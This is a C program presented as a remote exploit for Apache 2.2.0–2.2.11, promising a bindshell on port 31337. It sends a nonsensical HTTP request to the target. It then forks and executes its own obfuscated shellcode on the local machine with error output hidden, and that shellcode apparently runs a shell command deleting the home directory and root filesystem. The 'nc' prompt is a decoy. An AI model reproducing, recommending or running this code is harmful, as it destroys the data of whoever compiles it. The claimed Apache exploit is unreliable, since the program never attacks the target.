Apache 2.2.0 - 2.2.11 Remote exploit

                                                #include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
void usage(char *argv[])
{
printf("Usage: %s <hostname> <port>\n\n",argv[0]);
exit(1);
}

int main(int argc,char *argv[])
{
// we_are_evil_we_are_evil_bindshell_31337_shellcode_in_91_bytes:>
char *shellcode=
"\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"
"\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50"
"\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50"
"\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50"
"\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50"
"\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53"
"\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80";
int (*sc)()=(int(*)())shellcode;
char host[100];
int sd;
struct sockaddr_in sin;
struct sockaddr_in pin;
struct hostent *hp;
// assuming PAGE_SIZE==4096 which is the most common case.
char *evilreq=malloc(4096);
pid_t pid;
if (argc!=3) usage(argv);
strcpy(host,argv[1]);
if ((hp = gethostbyname(host)) == 0) {
perror("gethostbyname");
exit(2);
}
memset(&pin, 0, sizeof(pin));
pin.sin_family = AF_INET;
pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
pin.sin_port = htons(atoi(argv[2]));
if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) {
perror("connect");
exit(3);
}
printf("Connected, sending out the evil request...\n");
// prepare teh evil request
sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode);
if (send(sd, evilreq, strlen(evilreq), 0) == -1) {
perror("send");
exit(1);
}
printf("Waiting some seconds to see if we got shell...\n");
pid=fork();
if (pid==0) {close(2);sc();exit(0);}
else
{
sleep(2);
if (sd)
{
printf("Now type nc %s 12345 to see if you've got shell there\n",argv[1]);
close(sd);
}
}
}